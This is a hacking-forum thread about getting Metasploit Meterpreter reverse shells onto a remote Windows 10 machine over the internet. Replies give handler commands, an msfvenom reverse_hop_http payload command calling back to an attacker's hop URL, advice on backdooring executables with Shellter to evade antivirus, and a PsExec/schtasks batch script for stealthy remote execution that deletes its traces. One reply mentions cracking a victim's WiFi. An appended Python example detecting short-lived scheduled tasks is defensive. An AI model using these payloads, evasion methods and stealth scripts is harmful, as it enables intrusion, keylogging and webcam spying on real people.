
metasploit and windows 10


zalim786


Hello guys,

I am posting here for the first time, but I have been following these forums for a while now.

My friend and I are trying to create a payload to hack into Windows 10 and control it using Metasploit.

We have done similar tests before on Windows XP, 7 and 8. In BackTrack it all worked smoothly, and mostly we tested over the LAN, but now we want to test on a Windows 10 machine which is 200 km away from my place. It's my friend's system; he has turned Windows Firewall and antivirus off, Defender is also not running, and all the security is down.

There is a method of getting into Windows 10 using a macro. We haven't tested that yet, but that will be the next logical step for us.

So now to the problem.

We are using Kali 2.0 (I am still using Windows 7 due to some technical reasons). On my Windows 7 I am running Kali 2.0 in VMware (bridged network).

So when I create a payload and send it to my friend on his Windows 10, it doesn't open any session for me. He tried the same file on his Windows 7 and Metasploit still opened no session for me.

Here is what I am doing.

Using veil-evasion I use windows/meterpreter/reverse_tcp

LHOST (my public IP)

Once I tried my open port, which was 8080; when that didn't work I tried without giving any port in this first step.

So after generating the file, called test.exe, I opened my msfconsole and did the following:

- use exploit/multi/handler (duh)
- set payload windows/meterpreter/reverse_tcp
- set LHOST (my Internet Kali IP)
- set LPORT 8080
- exploit

So now it's running and I gave the file to my friend. He opened it on Windows 10: nothing happened. He opened it on Windows 7: nothing happened. He even opened it on old XP and nothing happened...

Now I thought, OK, let me try it on the LAN.

So this time during the first step I gave LHOST (internet Kali IP) with LPORT 8080 and created a file called testlocal.exe.

When I opened it on Windows 10 locally it worked perfectly; I got the session.

So my question is, why isn't it working over the internet? I mean we have tried the app called DarkComet and it works on his Windows XP, 7 and 8 but not on Windows 10 (for obvious reasons),

but this payload isn't working on any Windows at all over the internet. Am I missing something? Am I doing something wrong?

I haven't tried the macro method yet, but once I have success here I will go for the macro method.

Any idea guys?

Thanks in advance,

and forgive my English :)


Have you got port forwarding set up on your router so the port you specify in the payload is mapped back to your machine?

Look back in the forums, debugging this has been discussed quite a few times.


Yes, my Kali 2 (on VMware) has this IP:

192.168.0.5

and on my router I have port 8080 forwarded, and I can also see 8080 open on the canyouseeme website....

BTW I also tried with the No-IP DUC using reverse_tcp_dns and still no success.

I have searched the forum again and again without much success.....


Done, all ports are open and working, allowing traffic.

Now I have realised something.

I have just tried the same file on another friend's laptop (he is using Windows 10). It worked, even though he is very far away.

So I thought, OK, why wouldn't it work on my first friend? So I asked my first friend to disconnect his Windows 10 laptop from the router he is using and connect it to the internet through his iPhone (using LTE data). As he did that, it worked, and it worked perfectly; I was able to get a connection.

Now, is it possible that ROUTERS don't allow it? Even though his router firewall was also down and he even opened a few ports for me, still it wasn't possible.

He is using this modem:

Hitron Technologies CVE-30360

I asked him to do it locally using his LAN and as he tried it, it worked. I mean this problem is so absurd that it's funny:

- He gets sessions from the Windows 10 laptop using his Kali 2.0 when they both are connected to the same network.
- When the Windows 10 laptop is connected to his iPhone LTE, I get sessions as well.
- When his Windows 10 laptop is connected to his router, I don't get any sessions anymore, yet he still gets them from his other Kali 2.0 system on the same network.

I mean, what in that router could be stopping it?


This is a stupid question, but do you have port 8080 open on the Windows 10 machine?

netsh advfirewall firewall add rule name="Open Port 8080" dir=in action=allow protocol=TCP localport=8080

If you want to test your payload to see if it works, test it without the firewall first.

I had problems about a month ago trying to shell a Windows 10 box, and here's some stuff I figured out. Windows 10 has some security features that are not available in previous versions of Windows. I'm not sure how it all works. Windows will notice that your payload is trying to hook into other system processes or DLLs on the Windows system. But if you inject your payload into the execution flow of a legitimate application it will run just fine and Windows isn't going to notice anything fishy.

Here's something else you can do. Use a reverse_hop_http meterpreter:

msfvenom -p windows/meterpreter/reverse_hop_http -e x86/shikata_ga_nai -i 3 --platform win HOPURL=http://192.168.0.184/hop.php EXTENSIONS=stdapi,priv -f raw -o /root/Desktop/donkeypunch.raw

You can output it to whatever format you think will work. I noticed my payloads were getting flagged by Security Essentials and other anti-virus programs, so I decided I would backdoor a legitimate executable. I did that with a program called Shellter. Worked like a charm.

Keep in mind that Shellter will not work with all binaries and also doesn't work every time. Sometimes you will have to try backdooring the exe several times before it's successful. Shellter does a lot of stuff that is at this point technically beyond me, but you can read about it on the website: https://www.shellterproject.com/

Payload is built; make it available for download. Don't forget to move hop.php to your /var/www/html/ folder and start Apache.

use exploit/multi/handler
set HOPURL http://192.168.0.184/hop.php
set payload windows/meterpreter/reverse_hop_http
exploit -j

Once the binary is run on the Windows 10 machine, you should see a session. If you get a session for like 20-30 seconds and then the session dies, it's because your payload was caught by Windows 10 security features.

The great thing about this is that once you build a payload like this it will work on Windows 7 or XP as well.

Also I think there's a way to bind meterpreter to Edge or Internet Explorer with prepend migrate and masquerade as that application so it can hop the firewall that way. If there is a way to do that I would like to know it.

Edited by vailixi

Thanks a lot for the reply, I will try it out with my friend tomorrow.

Well, yes, port 8080 was open when we were testing it, but the problem isn't Windows 10 security anymore. We managed to get a working session from Windows 10 using meterpreter/reverse_https and the ReverseListenerBindAddress option; we managed the connection. The problem now is something so weird that I have never encountered it before.

So the problem is:

My friend is using a Hitron Technologies CVE-30360 router, and no matter what exploit or RAT you use, this router seems super intelligent compared to other routers. You can locally (on LAN) hack into any Windows through this router using Metasploit, but on the INTERNET it seems ALMOST impossible.

These are the things we have tried so far.

My friend's Windows 10 laptop, which is 200 km away from me, is connected to a Hitron Technologies CVE-30360 router.

So as long as it is connected to this router, you will get no sessions on Metasploit from it, NONE, it won't work. Even DarkComet RATs (which don't work on Windows 10 anyway) won't work on older Windows like XP, 7 or 8, even if all the PORTS are open and all the security is down; you still can't get anything from it through the internet.....

But if you try Metasploit and DarkComet RATs LOCALLY, they work fine; that router will allow local traffic to pass. Locally you can exploit any Windows with Metasploit.

So now we thought, let us disconnect our Windows 10 laptop from the Hitron Technologies CVE-30360 router and connect it to the internet through iPhone 6 LTE tethering....

So we did that, and what do you know? You get a session on Metasploit, you can exploit the Windows 10 any way you want, you can play around with data, cmd, webcam, keylog, anything, UAC controls, anything you want, and when you connect it back to the Hitron Technologies CVE-30360 everything stops. And trust me, all the ports are open; we have tried a Netcat listener, you can open backdoors, yet still...

I mean, I could be missing something, but I really have never experienced anything like this before...


Also, is there a way to program a payload.exe in a way that it executes like a time bomb? I mean you set a date, like say 15.01.2016, and that's when it executes automatically?

I really am interested in something like that....

On Linux

Crontab

#echo new cron into cron file
echo "00 09 * * 1-5 echo hello" >> newcron
#install new cron file
crontab newcron

On Windows scheduled task

SchTasks /Create /SC DAILY /TN "The_name_of_your_task" /TR "notepad.exe" /ST 04:00

There are a lot of other task schedulers, none of which I have used.

Edited by vailixi

Can an exe file execute on a given date automatically using cron?

Let's say I put that exe file on a USB stick, plug that USB into another PC and copy that exe file there, without first executing it by clicking. I just copy it and leave it there; will it automatically execute?


No, you would have to run something to set up the scheduled task to run the script.

Well then that's something different; there are many other options to do something like that.

I am interested in something that will do it all on its own, an exe that will execute on its own....

Link to comment
Share on other sites

The easiest way to do it would be to have them run a batch file which copies the exe to the drive and then creates the scheduled task. This is completely non-stealthy and would require social engineering to get them to run the initial batch file, but would be fairly easy to implement. You could work up from there to an exe which has your app built into it; once the exe runs it unloads the exe and then creates the task.

On very old Windows boxes USB had autorun, so this would be easy, but that was removed.


Call schtasks with system(). So somewhere in your payload you add a line like this:

system("SchTasks /Create /SC DAILY /TN \"The_name_of_your_task\" /TR \"notepad.exe\" /ST 04:00");

Using PsTools you can do this stealthily. You need to be connected to the same network.

It shows a CMD window for a millisecond, barely noticeable. Most people would think nothing of it.

You DON'T need the user's password for this, just their username. The script also covers its tracks and automatically runs in 80 seconds' time.

I cannot guarantee 100% this works in Windows 10. Tested in Windows 7 and 8. Can't remember if I got this to work when running the schtask as SYSTEM; give it a try.

Anything in [ ] needs amending.

XCOPY C:\FOO.bat \\[IP]\c$ /E /S /C /Y

REM Build HH:MM two minutes from now. Leading zeros (or the leading space some
REM locales put before a single-digit hour) are stripped first so that set /A
REM does not read 08 or 09 as octal.
set hh=%time:~0,2%
if "%hh:~0,1%"=="0" set hh=%hh:~1,2%
if "%hh:~0,1%"==" " set hh=%hh:~1,2%
set mm=%time:~3,2%
if "%mm:~0,1%"=="0" set mm=%mm:~1,2%
set /A mm=%mm%+2
if %mm% GEQ 60 set /A mm=%mm%-60 && set /A hh=%hh%+1
if %hh% GEQ 24 set hh=0
REM Re-pad single digits to two characters so schtasks accepts the /ST value
if %mm% LSS 10 set mm=0%mm%
if %hh% LSS 10 set hh=0%hh%
set hhmm=%hh%:%mm%
echo %hhmm%

psexec \\[IP] -s -c -f cmd.exe /c "Schtasks /create /RU [USERNAME] /SC ONCE /TN [TASK NAME] /TR c:\FOO.bat /ST %hhmm%"

Timeout 80

psexec \\[IP] -s -c -f cmd.exe /c "del C:\FOO.bat"

psexec \\[IP] -s -c -f cmd.exe /c "Schtasks /Delete /TN [TASK NAME]"

*Edit* I see you are trying this over the net. Apologies, maybe the above isn't quite what you want. However, you could try to amend this code and get it to work over the net (technically, I would say it is possible), or keep in mind that you could always travel to the location of your victim system. You'd just have to be close enough to crack their WiFi.

Edited by haze1434

Can't [username] just be the variable %USERNAME%, instead of actually having to know the username? Or get the username as a variable and concatenate it to the command string you want to use. This might help to automate things a bit.

If you don't specify a username, the system would run FOO.bat as SYSTEM, which wouldn't give you much access to do anything.

If you just put %USERNAME%, without specifying its value in the script, it would attempt to pull your username from your PC, which likely would mean FOO.bat wouldn't run.

*Edit*

Note - it is only for the command...

psexec \\[IP] -s -c -f cmd.exe /c "Schtasks /create /RU [USERNAME] /SC ONCE /TN [TASK NAME] /TR c:\FOO.bat /ST %hhmm%"

... that you need to specify the %Username%.

In FOO.bat itself, you could put %Username% as undefined, as the batch file would be running as the target user anyway.

Edited by haze1434
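The scheduled-task approach discussed in the last few posts (create a task pointing at a batch file, let it fire, then delete the task) leaves a distinctive trace in the Windows Security log, and this added example, which is not from the thread, shows how a defender would pick it out: it flags tasks whose 4699 deletion event follows the 4698 creation event within a few minutes, and tasks whose action runs a script file or anything from the drive root or a user-writable folder. The flat record shape and the sample events are constructed for illustration; in a real export these fields come from the 4698 event's TaskName and the Exec Command inside its task XML.

```python
"""Spot scheduled tasks that are created and removed within minutes, or that run
a script from an odd location. Sample records below are constructed, not real logs."""
from datetime import datetime
import re

# Constructed sample: a flattened view of Security log events 4698 (task created)
# and 4699 (task deleted). Real exports carry these values inside the event XML.
SAMPLE_EVENTS = [
    {"time": "2016-01-15T03:58:10", "id": 4698, "task": "\\Updater",
     "user": "SYSTEM", "command": "c:\\FOO.bat"},
    {"time": "2016-01-15T03:58:12", "id": 4698,
     "task": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "user": "SYSTEM", "command": "%windir%\\system32\\defrag.exe"},
    {"time": "2016-01-15T03:59:40", "id": 4699, "task": "\\Updater",
     "user": "SYSTEM", "command": ""},
]

WRITABLE_DIRS = ("\\temp\\", "\\tmp\\", "\\users\\public\\", "\\appdata\\")


def is_unusual_action(command):
    """Heuristic: legitimate software rarely registers a task that runs a batch or
    script file, a file sitting directly under the drive root, or anything from a
    user-writable folder."""
    path = command.strip().strip('"').lower()
    if path.endswith((".bat", ".cmd", ".vbs", ".ps1")):
        return True
    if re.match(r"^[a-z]:\\[^\\]+$", path):  # e.g. c:\foo.exe, nothing below the root
        return True
    return any(d in path for d in WRITABLE_DIRS)


def short_lived_tasks(events, window_seconds=300):
    """Return task names whose 4699 deletion followed their 4698 creation within
    window_seconds: the create, wait, delete sequence that leaves no persistent task."""
    created, flagged = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4698:
            created[ev["task"]] = ts
        elif ev["id"] == 4699 and ev["task"] in created:
            if (ts - created[ev["task"]]).total_seconds() <= window_seconds:
                flagged.append(ev["task"])
    return flagged


def unusual_action_tasks(events):
    """Return task names (from 4698 events) whose action path looks unusual."""
    return [ev["task"] for ev in events
            if ev["id"] == 4698 and is_unusual_action(ev["command"])]
```

On a real host, enabling "Audit Other Object Access Events" is what makes 4698/4699 appear in the Security log in the first place.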